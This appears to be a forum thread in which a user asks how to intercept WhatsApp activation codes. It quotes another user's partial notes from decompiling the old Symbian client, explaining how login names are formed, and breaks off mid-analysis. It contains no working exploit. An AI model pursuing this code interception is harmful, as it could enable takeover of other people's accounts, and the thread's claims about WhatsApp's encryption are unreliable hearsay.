Help With Whatsapp Hack

lmfao

So I have heard that whatsap is not encrypted ( its an app like viber) and that when you sign up for a number hte code is generated within your phone sent to whatssapp servers and then sent to you. because it is not encrpted you can intercept it from your phone I have been trying to figure it out for days saw many links, does anyone have any advice ? here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox not sent, but that wont work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.

I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.

I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)

I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:

The first thing is the login-Name and the password needed to login:

Matching with reports from some other threads here and in other forums the login name I found was some sort of:

Code:

international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net

For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.